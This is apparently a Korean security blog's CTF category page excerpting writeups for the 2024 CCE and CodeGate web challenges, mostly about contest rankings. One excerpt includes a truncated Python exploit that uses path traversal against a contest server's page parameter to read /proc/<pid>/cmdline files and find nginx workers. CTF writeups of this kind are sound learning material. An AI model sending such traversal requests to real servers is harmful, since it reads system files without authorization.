| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
- 해킹
- Python
- XSS
- SQL
- CCE
- crosssitescripting
- ubuntu
- webhacking.kr
- web
- sqli
- 시스템프로그래밍
- Los
- ctf
- SQLInjection
- CODEGATE
- 시스템
- SQL Injection
- rubiya
- lordofsqlinjection
- 프로세스
- Writeup
- Linux
- webhackingkr
- 웹해킹
- 알고리즘
- WebHacking
- MySQL
- hacking
- 상호배제
- 운영체제
- Today
- Total
목록CCE (3)
One_Blog
2024 CCE & CodeGate 2024 Final Web Writeups
이번에 CCE / CodeGate 2024 본선에 다녀왔고, codegate는 예선과 같은 11등, CCE는 3등이라는 성과를 거두었다. 코게는 수상이 어려울 거라고 생각했고, CCE는 수상은 할 거 같았는데 1 / 2 / 3위 중 어떤 순위를 차지하느냐의 문제라고 생각했는데.. 너무 내 예상대로 흘러간 것 같아 아쉬웠다. 물론 두 대회 다 댈 핑계는 많지만.. 뭐 결과적으로 실력이 부족했다고 생각한다. 작년에 누구처럼 0솔짜리 웹 문제 싹 다 풀었으면 부족할 거 없이 1등을 차지할 수 있었을 것이기 때문이다. 코드게이트 스코어 보드인데, 난 11위를 차지했다. 1등은 선린의 msh1307 이었고, 2등은 나와 올해 같은 CTF팀인 luv(얘도 선린)이었다. 3등은 이스라엘의 ItayB라는 분이셨다. ..
2024 CCE CTF Preliminaries Web All Writeup
이번 주말에 CCE를 즐겨줬다. 웹 문제가 생각보다 많아서 당황했는데.. 결과적으로 6문제 중에 4문제를 솔브했다. 다 풀진 못했지만 학생부에서 웹 최다 솔브 였기에 기분이 좋았고, 결과적으로 2등이라는 나쁘지 않은 예선 성적을 거둬서 기분이 좋았다. 갠적으로 1등 노려보고 싶었는데, 1등이 디미고 연합 팀이었다. 아마 본선가도 저 팀이 1등할거같은 느낌적인 느낌이다. 아무튼간에 web 라이트업 작성해보겠다. Time Travel이건 뭘 알려주려고 만든 문제인 지 이해가 안되는 문제인데.. 그냥이거 돌려서 나오는 유니코드 문자 중에 몇개 골라서 보내주면 passcord 검증이 통과가 된다. 문제 자체가 간단하고 최다 솔브 문제라 자세하게 적지 않겠다. gg Internal Inspectionfrom fl..
CCE.. 예선이 5월인가 그랬는데 중간에 행사가 너무 많아서 이제야 올리게됐다. 사이트도 다 닫히고 이미 할 게 없는 수준이지만 그냥 심심해서 올려본다. import sys,threading, requests URL = f'http://20.196.197.149:8000/' cpus = 0 pid_max = 4194304 nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'page': f'../../../../../../proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx worker found: {pid}') nginx_..